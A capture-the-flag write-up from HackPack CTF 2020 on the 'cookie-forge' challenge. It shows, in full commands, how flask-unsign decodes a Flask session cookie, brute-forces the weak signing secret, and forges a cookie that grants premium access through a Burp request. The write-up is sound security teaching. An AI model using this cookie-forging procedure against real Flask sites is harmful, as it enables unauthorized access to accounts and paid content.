The website is using flask. A page is reserved for premium member.

We know that flask cookie have some issues.

We place an order. Login as toto:toto get the cookie and pass it to flask-unsign. The tool can decode it as the secret is only use to sign the cookie.

$flask-unsign -d -c 'eyJmbGFnc2hpcCI6ZmFsc2UsInVzZXJuYW1lIjoidG90byJ9.Xp2SeA.1l6nDFaIsDZ8bCXcxdtORRVIBK0'
{'flagship': False, 'username': 'toto'}

We need to get the secret to forge our own cookie

$ flask-unsign --server https://cookie-forge.cha.hackpack.club/orders --unsign
[*] Server returned HTTP 302 (Found)
[+] Successfully obtained session cookie: eyJfZmxhc2hlcyI6W3siIHQiOlsid2FybmluZyIsIllvdSBtdXN0IGxvZyBpbiBmaXJzdCEiXX1dfQ.Xp2TwA.IiGnkGfSx0j-O_vLTjmUyU95zLQ
[*] Session decodes to: {'_flashes': [('warning', 'You must log in first!')]}
[*] No wordlist selected, falling back to default wordlist..
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 39090 attempts

We modify the flagship value and sign our cookie with the secret password1

$ flask-unsign --sign --secret password1 --cookie "{'flagship': True, 'username': 'toto'}"

Using Burp repeater we modify our cookie to get the flag

GET /flag HTTP/1.1
Host: cookie-forge.cha.hackpack.club
Cookie: session=eyJmbGFnc2hpcCI6dHJ1ZSwidXNlcm5hbWUiOiJ0b3RvIn0.Xp2TRQ.XlXCKJYANDb9ghp5ms_fKQhTkVY
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Content-Length: 2617
Content-Type: text/html; charset=utf-8
Date: Mon, 20 Apr 2020 12:26:22 GMT
Server: meinheld/1.0.1
Vary: Cookie

You are a <em>special</em> customer!
To come back for more, sugar-coma after sugar-coma, in the face of mounting pressure from your doctors,
your family, and your own common senseā€¦
That's dedication.

Just to show our appreciation for your morbid commitment to our life-altering products, we're giving you this flag:


Original writeup (https://maggick.fr/2020/04/hackpack-ctf-2020.html).